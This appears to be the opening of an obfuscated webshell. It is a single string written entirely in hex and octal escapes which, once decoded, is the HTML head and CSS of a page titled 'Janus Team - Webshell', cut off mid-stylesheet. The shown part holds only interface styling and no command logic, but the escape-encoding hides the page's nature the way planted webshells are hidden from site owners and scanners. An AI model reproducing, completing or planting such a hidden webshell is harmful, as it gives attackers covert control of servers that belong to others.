"\x20\x3c\41\104\x4f\x43\124\131\x50\105\x20\150\x74\x6d\x6c\x3e\xa\40\x3c\x68\164\x6d\x6c\x20\154\141\x6e\147\75\42\145\156\x22\x3e\xa\40\x3c\150\145\141\x64\76\xa\x20\x9\x3c\x6d\x65\x74\x61\x20\143\x68\141\162\163\x65\x74\75\42\125\x54\106\55\x38\42\x3e\12\40\11\x3c\155\x65\x74\141\x20\156\x61\x6d\x65\x3d\42\x76\151\x65\167\x70\x6f\x72\164\x22\x20\143\x6f\x6e\x74\145\156\x74\75\x22\x77\151\x64\x74\x68\x3d\144\145\x76\151\143\145\55\x77\151\x64\164\150\54\40\151\156\151\164\x69\141\x6c\x2d\x73\143\141\x6c\x65\x3d\x31\x2e\60\42\x3e\xa\x20\11\x3c\x74\151\164\154\145\76\112\141\156\165\x73\x20\x54\145\x61\155\40\x2d\40\x57\145\x62\x73\x68\145\x6c\x6c\x3c\57\164\x69\164\x6c\x65\76\12\x20\40\x20\x20\x20\x3c\154\x69\x6e\x6b\x20\162\145\x6c\x3d\x22\151\x63\157\156\42\x20\x68\x72\x65\x66\75\42\x64\141\x74\x61\72\x69\155\141\147\145\57\x73\x76\147\53\x78\155\x6c\54\74\163\166\x67\x20\170\x6d\x6c\156\x73\75\47\x68\164\x74\160\72\57\57\x77\x77\x77\56\167\x33\56\x6f\162\x67\57\62\60\60\60\x2f\163\x76\x67\47\x20\x76\x69\x65\x77\x42\157\170\75\47\60\x20\60\40\63\x32\40\63\x32\47\x3e\x3c\160\141\164\150\x20\146\x69\154\154\x3d\47\45\62\x33\146\146\143\x37\x37\x37\x27\40\x64\x3d\47\115\62\60\x20\66\x68\55\70\x76\x31\x36\143\x30\40\x34\56\64\x31\x2d\63\x2e\x35\71\x20\70\x2d\x38\40\x38\166\62\143\65\56\65\x32\x33\x20\60\x20\61\60\x2d\x34\x2e\64\x37\67\x20\61\x30\x2d\61\60\126\x36\x7a\47\x2f\76\x3c\x2f\163\166\x67\76\42\x3e\xa\x20\11\x3c\154\x69\x6e\x6b\40\162\145\154\75\x22\160\162\x65\143\x6f\x6e\x6e\x65\x63\164\42\x20\150\162\x65\x66\75\x22\x68\164\x74\x70\x73\72\57\57\146\157\x6e\164\x73\56\x67\x6f\x6f\x67\154\145\x61\x70\x69\x73\56\x63\157\x6d\x22\x3e\x3c\154\x69\x6e\153\40\x72\x65\x6c\75\42\x70\162\145\143\157\156\x6e\x65\x63\164\42\x20\x68\x72\x65\146\x3d\42\150\164\x74\160\163\x3a\x2f\57\146\x6f\156\164\x73\x2e\x67\163\x74\141\x74\x69\143\56\143\157\155\x22\x20\143\x72\157\x73\x73\x6f\x72\151\x67\x69\x6e\x3e\74\x6c\151\x6e\153\x20\x68\162\x65\x66\75\x22\150\x74\x74\x70\x73\72\57\x2f\x66\157\156\164\163\x2e\x67\157\x6f\147\154\x65\141\160\x69\x73\56\143\x6f\x6d\x2f\143\x73\163\62\x3f\x66\141\x6d\x69\154\x79\x3d\106\x69\162\x61\53\x43\x6f\x64\145\x3a\x77\147\150\x74\100\64\60\60\73\x35\60\x30\73\x37\60\x30\46\144\x69\163\160\x6c\141\171\75\163\x77\x61\x70\42\40\162\145\x6c\x3d\x22\x73\x74\x79\x6c\145\x73\x68\145\x65\164\x22\x3e\12\x20\x9\74\154\151\156\153\40\x72\x65\x6c\x3d\x22\163\164\171\154\x65\x73\150\x65\x65\164\x22\40\x68\162\x65\x66\x3d\42\x68\x74\164\x70\163\x3a\57\x2f\x63\x64\x6e\152\x73\x2e\143\x6c\x6f\x75\144\146\x6c\141\x72\x65\x2e\143\x6f\155\x2f\141\152\x61\x78\57\x6c\x69\142\x73\57\x63\157\144\x65\155\x69\x72\x72\x6f\x72\x2f\65\x2e\x36\65\x2e\x31\65\x2f\143\x6f\x64\x65\155\151\x72\162\x6f\x72\x2e\155\x69\156\x2e\x63\163\163\42\x3e\12\x20\11\x3c\154\151\156\153\40\x72\145\x6c\x3d\x22\x73\x74\171\154\x65\x73\x68\145\145\164\x22\40\x68\x72\x65\146\x3d\x22\x68\x74\x74\x70\163\72\x2f\x2f\x63\x64\x6e\x6a\163\56\143\x6c\157\165\144\x66\154\141\x72\145\x2e\x63\157\x6d\x2f\141\152\x61\x78\x2f\x6c\151\x62\x73\x2f\x63\157\x64\x65\x6d\x69\162\162\157\x72\x2f\x35\56\66\x35\56\x31\65\57\x74\150\145\x6d\x65\57\x64\162\x61\143\x75\154\x61\56\155\x69\x6e\56\143\x73\163\x22\76\xa\x20\11\74\163\x74\171\154\x65\x3e\12\x20\11\11\72\x72\x6f\157\164\40\173\x20\55\55\x66\x6f\156\164\x2d\x66\141\155\x69\154\171\72\x20\47\x46\x69\x72\141\x20\x43\x6f\x64\145\47\54\x20\x6d\157\x6e\157\163\160\141\x63\145\73\40\x2d\x2d\142\x67\x2d\x64\141\x72\153\72\x20\x23\x31\141\x31\x64\62\64\73\40\x2d\55\142\147\x2d\155\x65\144\72\40\43\x32\62\62\66\62\x66\x3b\40\x2d\x2d\142\147\x2d\x6c\151\x67\150\164\x3a\x20\43\62\143\x33\x31\63\143\x3b\x20\55\x2d\142\157\x72\144\x65\162\55\x63\x6f\x6c\x6f\x72\72\x20\x23\x33\x38\63\145\x34\141\73\40\x2d\55\164\x65\x78\164\55\x6c\x69\x67\x68\164\72\x20\43\145\x30\x65\x30\x65\60\x3b\40\x2d\x2d\164\x65\170\x74\x2d\x6d\x65\x64\x3a\x20\43\141\x30\141\60\x61\60\73\x20\x2d\55\141\x63\x63\x65\156\x74\55\142\x6c\x75\145\x3a\x20\43\x38\62\141\x61\x66\x66\x3b\x20\55\55\141\x63\x63\x65\x6e\164\55\x67\157\x6c\x64\72\40\43\x66\146\x63\x37\67\x37\73\x20\x2d\x2d\x61\143\x63\x65\x6e\x74\55\162\x65\x64\x3a\40\x23\146\x66\x35\65\67\62\x3b\x20\55\55\x61\143\x63\x65\156\164\55\x67\x72\145\145\156\72\x20\43\x63\63\x65\70\x38\x64\73\x20\x7d\12\x20\x9\11\52\40\x7b\x20\142\x6f\x78\x2d\x73\151\172\x69\156\147\72\x20\x62\x6f\162\144\145\x72\55\x62\x6f\170\x3b\x20\175\xa\x9\11\x62\x6f\x64\x79\40\173\40\x66\157\x6e\x74\x2d\x66\x61\x6d\x69\154\x79\x3a\40\166\141\162\50\x2d\55\146\157\156\x74\x2d\x66\x61\155\151\154\x79\51\73\40\x62\141\x63\153\147\x72\157\x75\156\x64\x2d\143\x6f\x6c\x6f\x72\72\40\x76\x61\x72\x28\55\x2d\x62\x67\55\x64\141\162\153\x29\73\40\x63\x6f\154\x6f\x72\72\x20\166\141\x72\50\55\55\x74\145\x78\164\55\154\151\147\150\164\x29\73\40\155\x61\x72\147\x69\x6e\72\40\60\73\x20\144\151\x73\x70\154\141\171\x3a\40\146\x6c\145\170\x3b\x20\146\x6c\x65\170\55\x64\151\x72\145\143\x74\x69\x6f\x6e\x3a\40\x63\x6f\x6c\x75\x6d\x6e\73\40\150\145\x69\x67\x68\164\x3a\40\x31\60\60\x76\x68\73\x20\146\157\156\164\x2d\x73\x69\172\145\72\x20\61\x34\x70\x78\73\40\157\x76\x65\x72\x66\154\x6f\x77\72\40\150\x69\x64\144\x65\x6e\73\40\175\12\11\x9\x2e\x73\x69\144\x65\142\141\x72\40\x7b\40\144\x69\x73\x70\154\141\x79\72\40\156\157\x6e\145\73\40\x7d\12\x9\x9\56\x73\x79\163\x74\x65\x6d\55\151\x6e\146\157\x2d\x68\145\x61\x64\145\x72\40\173\40\x62\x61\x63\153\x67\x72\x6f\165\156\x64\x3a\x20\x76\141\162\x28\55\x2d\142\x67\x2d\x6d\x65\144\x29\73\x20\x62\x6f\162\x64\x65\x72\x2d\x62\x6f\164\x74\157\x6d\x3a\x20\62\x70\170\x20\x73\x6f\154\x69\144\x20\166\x61\162\x28\x2d\55\142\157\162\144\x65\x72\55\143\157\x6c\x6f\162\x29\73\x20\x70\x61\144\144\151\156\x67\72\40\x31\x72\145\x6d\40\x31\56\x35\162\x65\155\73\x20\160\x6f\163\x69\164\x69\157\x6e\x3a\x20\x72\x65\x6c\141\164\x69\x76\145\x3b\40\175\12\11\11\x2e\150\x65\x61\x64\x65\x72\55\x63\157\x6c\154\x61\160\163\x65\x2d\x62\164\156\x20\173\x20\x64\x69\163\x70\154\141\171\x3a\40\156\x6f\x6e\145\73\x20\x70\x6f\x73\x69\164\151\x6f\156\72\x20\141\142\163\157\x6c\x75\x74\x65\x3b\40\x74\157\x70\72\40\x30\56\65\162\x65\155\x3b\40\x72\x69\x67\150\164\72\40\x30\56\x35\162\x65\x6d\x3b\x20\142\141\x63\x6b\147\x72\157\x75\156\144\72\40\166\x61\162\50\55\x2d\x62\147\x2d\x6c\151\x67\x68\164\51\x3b\x20\x62\x6f\162\x64\145\x72\x3a\x20\x31\x70\x78\x20\x73\x6f\x6c\x69\x64\40\166\x61\x72\x28\55\x2d\142\157\x72\144\x65\x72\x2d\x63\x6f\154\157\x72\51\73\40\x63\157\x6c\157\162\x3a\x20\166\141\162\50\55\x2d\x74\145\170\x74\x2d\154\x69\x67\x68\164\x29\73\x20\160\141\144\144\151\156\x67\72\40\x30\56\x32\x35\162\x65\155\40\x30\56\x34\162\145\155\x3b\x20\142\157\162\144\x65\x72\x2d\162\141\144\151\x75\x73\72\40\x34\160\170\73\40\143\x75\x72\x73\x6f\162\x3a\x20\160\x6f\151\156\164\145\x72\73\x20\146\157\x6e\164\55\x73\151\172\x65\72\x20\x30\x2e\70\x35\x72\x65\155\x3b\x20\172\x2d\151\156\144\145\x78\72\x20\61\x30\x30\60\73\x20\160\157\151\x6e\164\145\x72\x2d\145\x76\145\x6e\164\163\x3a\x20\141\165\164\x6f\73\40\165\x73\145\x72\x2d\x73\145\x6c\145\143\164\72\40\156\x6f\156\x65\73\40\175\xa\11\11\56\x68\145\141\x64\x65\162\55\143\157\154\x6c\x61\x70\x73\x65\55\x62\x74\156\72\150\x6f\166\145\x72\40\x7b\x20\x62\141\143\x6b\x67\162\157\x75\x6e\x64\72\40\166\x61\162\50\x2d\55\x61\143\x63\145\x6e\x74\x2d\142\x6c\x75\x65\x29\x3b\40\x63\x6f\x6c\x6f\162\72\x20\166\141\x72\x28\x2d\x2d\142\x67\55\144\x61\162\153\51\x3b\x20\175\xa\11\11\x2e\150\x65\141\x64\145\162\x2d\143\x6f\154\x6c\x61\x70\163\145\55\x62\164\156\72\x61\x63\164\x69\x76\x65\40\x7b\x20\x74\x72\141\156\x73\146\157\162\x6d\x3a\40\x73\x63\141\154\x65\x28\60\x2e\71\x35\x29\73\40\175\12\x9\x9\56\x73\171\163\164\145\155\x2d\151\156\x66\x6f\55\x68\145\141\144\x65\x72\55\143\157\156\164\145\156\164\40\173\x20\144\151\x73\160\x6c\141\x79\72\x20\x66\x6c\x65\170\73\40\152\x75\163\164\x69\x66\171\55\x63\x6f\156\x74\145\156\164\x3a\40\163\160\x61\x63\145\55\142\145\164\167\145\x65\x6e\x3b\40\141\x6c\x69\147\156\55\151\164\x65\155\x73\72\40\x66\x6c\145\x78\x2d\163\x74\141\x72\x74\x3b\40\147\141\160\x3a\x20\62\162\x65\155\73\x20\146\x6c\x65\x78\55\x77\x72\x61\x70\72\x20\x77\162\141\160\x3b\x20\175\xa\x9\x9\56\x73\x79\x73\x2d\151\156\146\x6f\55\154\x65\146\164\x20\173\x20\x66\154\x65\170\72\x20\61\73\40\144\x69\x73\x70\x6c\x61\x79\72\40\x67\x72\x69\x64\73\40\147\162\x69\144\x2d\164\145\155\160\154\x61\x74\145\x2d\143\x6f\154\x75\155\x6e\x73\72\x20\x72\x65\160\x65\x61\164\x28\141\165\164\x6f\55\x66\151\164\x2c\x20\x6d\151\156\155\x61\170\50\62\65\60\160\170\54\x20\x31\146\x72\51\51\x3b\40\147\x61\160\72\x20\60\x2e\x35\162\x65\x6d\x3b\x20\146\157\156\164\55\x73\x69\x7a\145\72\x20\x30\x2e\x38\65\162\145\x6d\73\40\175\12\x9\x9\x2e\x73\171\x73\x2d\151\x6e\x66\157\55\151\164\145\155\40\173\x20\x63\157\154\157\162\72\40\x76\141\x72\x28\x2d\55\164\145\x78\164\x2d\x6c\151\x67\150\164\51\x3b\40\160\x61\x64\144\151\x6e\147\x3a\x20\x30\x2e\x33\x72\145\155\x20\60\73\x20\175\12\x9\x9\56\x73\171\x73\x2d\x69\156\x66\x6f\x2d\151\x74\x65\x6d\40\x73\x74\162\x6f\x6e\147\40\173\x20\143\x6f\154\x6f\162\x3a\x20\166\141\162\x28\55\x2d\141\143\x63\x65\156\164\55\142\x6c\165\145\51\x3b\40\x6d\141\x72\147\x69\156\55\x72\151\x67\150\x74\72\x20\x30\x2e\65\162\145\155\x3b\40\x7d\xa\11\11\x2e\x73\171\x73\55\151\156\146\x6f\55\162\151\x67\150\x74\40\x7b\x20\x66\154\145\170\55\163\150\x72\x69\x6e\x6b\72\40\60\73\x20\164\145\170\164\55\141\154\x69\x67\156\x3a\40\162\x69\147\150\x74\x3b\x20\x7d\xa\11\x9\56\152\x61\x6e\165\x73\55\x6c\157\147\x6f\x2d\143\x6f\x6e\164\141\151\156\x65\162\x20\173\x20\144\151\163\160\154\141\x79\x3a\40\x66\154\x65\x78\x3b\x20\x66\x6c\x65\x78\55\x64\151\x72\x65\x63\164\151\157\x6e\72\40\143\157\x6c\x75\x6d\x6e\x3b\x20\141\154\151\x67\x6e\x2d\x69\x74\145\x6d\x73\72\40\x66\154\145\x78\x2d\145\x6e\x64\73\40\x7d\12\11\11\x2e\152\x61\156\165\x73\x2d\x6c\x6f\x67\x6f\x20\173\x20\146\157\x6e\164\x2d\146\x61\155\151\x6c\x79\x3a\40\x76\141\162\x28\x2d\x2d\x66\157\x6e\164\x2d\146\x61\x6d\x69\154\171\x29\73\40\143\x6f\x6c\x6f\x72\x3a\x20\x76\x61\162\x28\x2d\x2d\141\143\x63\x65\x6e\164\x2d\147\157\x6c\144\x29\73\40\164\145\170\x74\55\163\x68\141\144\x6f\167\72\x20\x30\x20\x30\40\x31\x30\160\170\x20\166\141\x72\50\x2d\x2d\x61\143\x63\x65\x6e\x74\x2d\147\157\x6c\144\51\x2c\40\x30\x20\x30\x20\62\x30\x70\x78\40\166\141\162\50\55\55\x61\x63\143\145\x6e\x74\55\147\157\154\x64\51\73\x20\x74\x65\170\x74\55\141\x6c\x69\x67\x6e\x3a\40\162\x69\x67\150\164\73\x20\167\x68\x69\x74\x65\x2d\x73\160\141\143\145\x3a\x20\x70\162\x65\73\40\146\x6f\156\164\x2d\x73\x69\172\145\x3a\x20\61\61\x70\x78\x3b\x20\x6c\151\x6e\145\55\x68\145\151\x67\x68\x74\x3a\40\x31\x2e\62\73\x20\x6d\x61\162\147\x69\x6e\72\x20\x30\73\40\175\xa\11\x9\56\152\x61\x6e\x75\163\55\166\x65\x72\163\x69\157\156\x20\x7b\x20\x63\x6f\154\157\162\x3a\40\x76\x61\x72\50\55\55\141\143\143\145\x6e\x74\55\147\x6f\154\144\x29\x3b\x20\x66\157\156\164\55\x73\x69\172\x65\72\x20\61\x2e\x31\x72\x65\x6d\x3b\40\146\x6f\x6e\164\x2d\167\145\x69\147\150\x74\x3a\40\x36\x30\x30\73\40\x6d\141\162\x67\151\156\55\x74\x6f\x70\x3a\x20\x30\x2e\x35\162\145\x6d\x3b\40\164\x65\x78\x74\55\x73\x68\x61\144\x6f\167\x3a\40\x30\x20\x30\40\x35\160\170\40\166\141\x72\x28\55\x2d\141\143\143\x65\x6e\164\x2d\147\x6f\x6c\x64\x29\73\40\x7d\xa\x9\x9\x2e\x6a\x61\x6e\x75\163\55\x74\x61\147\x6c\x69\156\x65\40\x7b\40\143\157\x6c\x6f\162\72\x20\166\141\162\50\x2d\x2d\164\145\x78\x74\55\155\x65\144\x29\x3b\40\146\x6f\156\x74\x2d\163\151\x7a\145\x3a\x20\x30\x2e\70\65\162\x65\155\73\40\x6d\141\x72\x67\151\x6e\55\x74\157\x70\72\40\60\x2e\x32\x35\162\145\155\x3b\x20\175\xa\x9\11\56\164\157\160\x2d\x6e\x61\166\x62\141\162\40\x7b\40\142\141\143\153\147\162\x6f\x75\x6e\144\72\40\166\x61\x72\x28\55\x2d\x62\147\x2d\155\x65\x64\x29\73\x20\142\x6f\162\x64\x65\x72\55\142\x6f\164\164\x6f\155\x3a\x20\62\160\x78\x20\x73\x6f\x6c\151\144\x20\166\141\x72\x28\55\55\142\x6f\x72\x64\145\162\x2d\143\x6f\154\x6f\x72\51\x3b\x20\160\141\144\144\x69\156\147\72\x20\x30\x2e\x35\162\x65\155\40\x31\x72\145\x6d\73\x20\160\x6f\163\x69\164\x69\157\156\x3a\40\163\164\x69\143\x6b\171\x3b\40\164\157\160\72\40\60\73\x20\x7a\x2d\x69\156\144\x65\170\72\40\61\60\60\73\x20\142\x6f\170\x2d\163\x68\141\144\x6f\167\x3a\40\60\x20\62\160\x78\40\61\x30\160\170\40\x72\147\142\x61\x28\x30\54\60\54\x30\x2c\x30\56\x32\x29\73\x20\x64\151\163\x70\x6c\141\171\x3a\x20\x66\154\x65\x78\x3b\x20\x66\x6c\145\x78\x2d\144\151\x72\145\143\x74\151\x6f\156\x3a\40\x63\157\154\165\155\x6e\x3b\x20\175\xa\x9\11\x2e\x6e\x61\166\55\143\157\x6c\154\x61\x70\x73\145\x2d\x62\x74\156\40\x7b\x20\144\x69\x73\160\154\141\x79\72\40\x6e\x6f\156\145\x3b\40\142\x61\x63\x6b\x67\162\x6f\x75\156\x64\x3a\x20\x76\x61\162\x28\x2d\55\x62\147\x2d\154\151\147\x68\164\x29\73\x20\x62\157\162\144\x65\x72\x3a\x20\61\160\x78\x20\163\157\154\151\x64\x20\x76\x61\x72\50\x2d\55\x62\x6f\162\x64\x65\162\55\143\x6f\x6c\x6f\162\51\x3b\x20\x63\157\154\157\162\72\x20\x76\x61\162\x28\55\x2d\164\x65\170\x74\x2d\154\x69\x67\150\164\51\x3b\x20\x70\141\x64\144\151\x6e\x67\72\x20\x30\56\x35\x72\145\155\x20\60\56\x37\65\162\145\x6d\73\x20\x62\157\162\144\145\x72\55\x72\x61\x64\x69\x75\163\72\x20\66\x70\170\x3b\x20\x63\x75\162\x73\157\x72\72\x20\160\x6f\151\156\164\x65\162\73\40\146\157\156\x74\x2d\x73\x69\172\145\72\x20\61\56\x32\162\145\155\x3b\40\155\x61\162\x67\x69\156\x2d\142\157\164\164\x6f\155\72\x20\60\x2e\x35\x72\x65\x6d\73\x20\167\x69\144\x74\x68\72\40\61\60\x30\x25\x3b\40\x7d\xa\x9\11\x2e\156\x61\166\x2d\x63\x6f\x6c\x6c\141\160\x73\x65\x2d\x62\164\x6e\72\150\x6f\166\145\x72\40\173\x20\x62\141\x63\x6b\x67\x72\x6f\165\156\x64\72\40\166\x61\162\50\x2d\55\x61\x63\x63\x65\x6e\164\55\x62\154\165\145\51\73\x20\143\157\x6c\157\x72\72\40\x76\141\162\50\x2d\55\x62\x67\55\144\x61\162\153\51\x3b\x20\175\12\x9\x9\x2e\156\x61\166\55\x62\x75\x74\x74\157\x6e\x73\x2d\143\157\156\164\x61\151\x6e\145\x72\40\x7b\x20\144\x69\x73\160\154\x61\171\x3a\40\x66\x6c\x65\170\x3b\x20\x61\154\x69\147\156\x2d\x69\164\x65\x6d\x73\x3a\40\x63\145\156\164\x65\162\73\x20\x67\x61\x70\72\x20\x30\56\65\x72\x65\x6d\73\40\146\x6c\x65\170\x2d\167\162\x61\x70\72\x20\167\x72\141\160\x3b\40\x6f\166\x65\x72\x66\154\x6f\x77\x2d\170\x3a\40\x61\165\164\x6f\x3b\x20\x7d\12\x9\11\x2e\x6e\x61\166\x2d\142\165\164\164\x6f\156\163\x2d\143\x6f\x6e\164\141\x69\156\145\x72\x3a\72\x2d\x77\145\142\x6b\x69\x74\x2d\x73\143\162\x6f\154\154\142\x61\x72\40\173\x20\150\145\x69\147\150\x74\x3a\40\64\160\x78\73\40\x7d\12\x9\11\x2e\x6e\141\166\x2d\142\165\x74\164\x6f\156\163\x2d\x63\157\156\x74\141\x69\156\x65\162\x3a\72\55\167\145\142\153\x69\x74\55\163\143\x72\x6f\154\x6c\142\x61\162\55\x74\x72\141\143\x6b\40\x7b\40\142\x61\x63\x6b\x67\x72\x6f\x75\x6e\144\x3a\40\x76\x61\162\50\55\x2d\142\147\x2d\x64\x61\x72\153\51\x3b\40\175\xa\x9\x9\56\x6e\x61\x76\55\x62\x75\x74\x74\157\x6e\163\55\143\x6f\x6e\164\x61\x69\156\x65\x72\72\72\x2d\167\145\x62\153\151\x74\x2d\x73\143\162\x6f\x6c\154\x62\x61\162\x2d\164\x68\x75\155\x62\40\x7b\x20\x62\x61\143\x6b\147\162\157\165\156\144\72\40\x76\141\x72\x28\55\x2d\142\157\162\x64\145\x72\x2d\x63\x6f\154\157\x72\51\x3b\40\142\x6f\162\x64\145\162\x2d\x72\141\144\x69\165\163\x3a\x20\62\160\170\x3b\x20\x7d\xa\x9\x9\x2e\x6e\x61\x76\x2d\142\165\164\x74\157\x6e\40\x7b\x20\x62\x61\x63\153\147\x72\157\165\x6e\x64\72\40\x76\141\x72\x28\x2d\55\142\x67\x2d\x6c\151\x67\x68\x74\51\73\40\143\157\154\157\162\72\40\x76\141\162\x28\x2d\55\164\x65\170\x74\55\154\151\147\x68\164\51\73\x20\x62\x6f\x72\144\x65\162\x3a\x20\61\x70\x78\40\163\x6f\x6c\x69\144\40\166\x61\x72\50\55\x2d\x62\157\x72\144\x65\162\x2d\x63\157\x6c\x6f\x72\51\73\40\160\x61\x64\x64\x69\x6e\x67\x3a\40\x30\56\66\162\x65\x6d\40\x31\x2e\x32\x72\145\155\x3b\40\x62\157\x72\144\145\162\x2d\162\141\x64\x69\165\x73\72\40\66\160\x78\73\x20\143\165\x72\x73\x6f\162\72\40\160\157\151\x6e\164\x65\162\x3b\x20\164\x72\x61\156\x73\151\164\x69\157\156\72\40\141\x6c\x6c\x20\60\x2e\x32\163\x3b\40\146\x6f\156\x74\55\146\141\x6d\x69\x6c\171\x3a\x20\166\x61\162\x28\55\x2d\x66\157\156\x74\55\x66\x61\155\151\x6c\171\51\x3b\40\146\x6f\x6e\164\x2d\x73\x69\x7a\145\x3a\40\x31\63\160\x78\x3b\x20\x66\x6f\x6e\164\55\167\x65\x69\x67\150\x74\72\40\65\x30\x30\x3b\40\167\x68\x69\x74\145\x2d\x73\x70\141\143\145\72\x20\x6e\157\167\162\141\160\x3b\x20\144\x69\163\160\x6c\x61\x79\x3a\40\x66\x6c\x65\x78\73\40\141\x6c\x69\147\156\55\151\x74\x65\155\163\x3a\x20\x63\x65\x6e\164\x65\162\x3b\40\147\141\160\x3a\x20\x30\x2e\65\x72\x65\x6d\73\x20\164\145\x78\164\x2d\144\145\x63\157\x72\141\164\x69\157\x6e\72\40\x6e\157\156\x65\73\x20\175\12\11\11\56\x6e\141\166\x2d\x62\x75\164\x74\157\x6e\72\150\x6f\x76\145\x72\40\x7b\40\142\141\143\x6b\147\162\157\165\156\x64\72\x20\x76\x61\162\50\55\55\141\143\143\x65\156\x74\x2d\142\x6c\x75\145\x29\x3b\40\x63\x6f\154\157\162\72\40\x76\x61\162\x28\x2d\55\x62\x67\55\x64\141\162\153\x29\x3b\40\142\x6f\162\144\145\162\55\x63\157\154\157\162\x3a\x20\x76\x61\x72\50\55\55\141\143\x63\x65\156\x74\55\142\x6c\165\145\51\73\x20\164\162\x61\x6e\x73\146\x6f\x72\x6d\72\x20\164\162\x61\x6e\x73\154\x61\x74\x65\x59\x28\x2d\62\160\170\x29\73\40\x62\157\170\55\x73\x68\141\144\157\x77\x3a\x20\60\40\64\160\170\40\70\160\170\40\162\147\142\x61\x28\61\63\60\x2c\40\61\x37\60\54\x20\62\65\x35\x2c\40\60\x2e\63\x29\x3b\40\175\xa\11\11\56\156\141\x76\55\142\165\x74\x74\x6f\156\x2e\141\143\164\x69\x76\x65\x20\x7b\x20\142\x61\x63\153\x67\x72\x6f\x75\x6e\x64\72\40\x76\141\162\x28\x2d\x2d\x61\x63\143\145\156\x74\x2d\142\x6c\x75\x65\x29\x3b\40\143\157\154\157\x72\x3a\40\x76\x61\162\50\x2d\55\142\147\55\x64\141\162\x6b\x29\x3b\x20\x62\x6f\162\x64\145\x72\55\x63\x6f\x6c\x6f\162\72\x20\166\x61\x72\50\x2d\x2d\x61\x63\x63\x65\156\x74\x2d\x62\154\x75\145\51\x3b\x20\x66\157\156\164\x2d\x77\145\x69\x67\x68\164\x3a\x20\x36\x30\x30\x3b\40\x62\157\170\x2d\x73\150\141\x64\x6f\167\72\x20\60\40\x34\160\170\x20\61\x32\160\x78\x20\162\x67\142\x61\50\x31\63\60\x2c\x20\61\67\60\x2c\x20\x32\65\65\54\x20\x30\x2e\64\x29\x3b\40\175\xa\11\11\x2e\x6e\141\x76\55\142\165\x74\164\x6f\x6e\x3a\x61\x63\x74\151\166\x65\x20\173\x20\x74\x72\x61\156\x73\146\157\x72\155\72\40\164\x72\141\x6e\x73\x6c\141\x74\x65\x59\50\x30\51\x3b\x20\175\xa\40\11\x9\x2e\x6d\141\x69\156\x2d\x63\157\x6e\x74\145\156\x74\x20\173\x20\x66\x6c\145\170\72\40\x31\73\x20\x64\x69\x73\160\154\x61\x79\x3a\x20\x66\154\x65\x78\x3b\40\146\x6c\145\x78\x2d\x64\151\x72\145\143\x74\151\x6f\156\x3a\40\143\157\x6c\x75\155\156\73\x20\x6f\166\x65\x72\x66\154\157\167\72\x20\x68\x69\x64\144\x65\x6e\73\x20\175\12\x20\11\11\x2e\x76\151\x65\167\x2d\x63\x6f\156\x74\141\x69\156\x65\x72\x20\x7b\x20\144\151\x73\x70\154\x61\x79\72\x20\x6e\x6f\156\x65\x3b\x20\146\154\x65\x78\x2d\x64\151\x72\x65\143\x74\151\x6f\x6e\x3a\x20\x63\157\x6c\165\155\x6e\x3b\40\x68\145\151\x67\x68\x74\x3a\x20\x31\60\x30\45\73\x20\x7d\xa\x20\x9\11\x2e\x63\x6f\x6e\x74\x65\x6e\x74\55\x68\145\x61\x64\145\x72\x20\173\40\x70\x61\x64\144\x69\156\x67\72\40\61\x72\x65\x6d\x20\61\x2e\x35\162\x65\155\73\x20\x62\141\143\153\x67\162\x6f\165\x6e\144\72\40\166\x61\162\50\55\x2d\142\x67\x2d\x6d\x65\x64\x29\x3b\x20\142\x6f\162\x64\145\162\x2d\x62\x6f\x74\164\157\155\x3a\x20\61\x70\170\40\163\157\x6c\151\x64\x20\166\x61\162\x28\55\x2d\x62\157\162\x64\x65\162\55\x63\157\x6c\157\162\x29\73\x20\x66\157\156\x74\55\163\151\x7a\x65\x3a\x20\x31\56\62\162\x65\155\73\x20\146\157\x6e\164\55\x77\145\151\x67\x68\x74\72\x20\x35\x30\60\73\x20\143\157\154\x6f\162\72\40\166\141\x72\50\x2d\x2d\164\145\x78\164\55\x6c\x69\x67\150\164\x29\73\40\146\x6c\x65\170\55\x73\x68\x72\151\156\x6b\72\x20\60\73\40\x7d\xa\x20\11\11\56\x63\x6f\156\164\145\156\x74\x2d\141\x72\x65\141\40\x7b\x20\x70\x61\x64\x64\151\156\147\72\x20\61\56\65\162\x65\x6d\x3b\x20\x6f\x76\145\162\x66\x6c\x6f\x77\55\x79\72\x20\141\x75\x74\157\x3b\x20\146\154\145\170\x3a\40\61\x3b\40\x7d\12\x20\x9\11\x23\x76\x69\145\x77\55\x64\141\163\x68\x62\157\x61\162\x64\40\x2e\x63\157\x6e\164\145\156\164\55\x61\x72\x65\x61\x20\x7b\x20\144\x69\x73\160\154\141\171\x3a\x20\146\x6c\x65\170\73\40\146\x6c\x65\x78\55\x64\151\162\x65\x63\x74\x69\x6f\x6e\x3a\x20\x63\157\x6c\165\155\156\73\40\147\141\x70\x3a\x20\62\x72\x65\155\73\40\x7d\12\x20\11\x9\x23\x6c\x6f\147\x6f\x2d\143\157\156\x74\x61\151\156\x65\x72\x20\173\x20\146\x6f\x6e\x74\x2d\146\x61\155\151\x6c\171\x3a\x20\166\141\162\50\55\x2d\146\x6f\x6e\164\x2d\146\141\155\x69\x6c\171\x29\x3b\40\143\157\154\x6f\162\72\40\x76\x61\x72\x28\x2d\x2d\141\143\x63\145\156\x74\x2d\147\x6f\154\x64\51\73\40\164\145\170\x74\x2d\163\x68\x61\144\157\167\72\40\60\40\x30\40\x31\60\160\x78\x20\166\x61\162\x28\55\x2d\141\x63\143\145\x6e\164\x2d\147\x6f\x6c\144\x29\x2c\40\60\x20\60\x20\x32\60\160\170\x20\166\141\162\50\x2d\x2d\141\x63\x63\x65\x6e\x74\55\x67\157\154\x64\51\x3b\x20\x74\145\x78\164\x2d\x61\x6c\151\x67\156\72\x20\143\145\156\x74\145\162\x3b\x20\167\150\x69\x74\145\55\x73\x70\141\143\x65\x3a\40\160\162\x65\x3b\40\146\157\156\x74\x2d\163\151\x7a\x65\x3a\40\61\63\160\170\x3b\40\x6c\151\x6e\x65\x2d\150\x65\151\147\150\x74\72\x20\x31\56\x32\x3b\x20\x7d\12\x20\11\x9\x2e\x6c\151\166\x65\55\x73\164\141\164\163\x2d\x63\157\x6e\x74\x61\151\x6e\x65\x72\x20\x7b\x20\x64\151\x73\160\x6c\x61\x79\72\x20\x67\162\151\x64\x3b\x20\147\162\x69\x64\55\164\145\155\160\154\x61\x74\x65\55\x63\x6f\154\x75\155\x6e\x73\x3a\x20\x72\145\x70\145\x61\x74\50\141\165\x74\x6f\x2d\x66\151\x74\54\x20\155\x69\156\155\141\170\x28\x32\65\60\160\170\x2c\40\x31\x66\162\51\x29\x3b\x20\147\141\x70\x3a\40\61\56\65\x72\x65\x6d\73\x20\167\x69\x64\x74\150\72\x20\x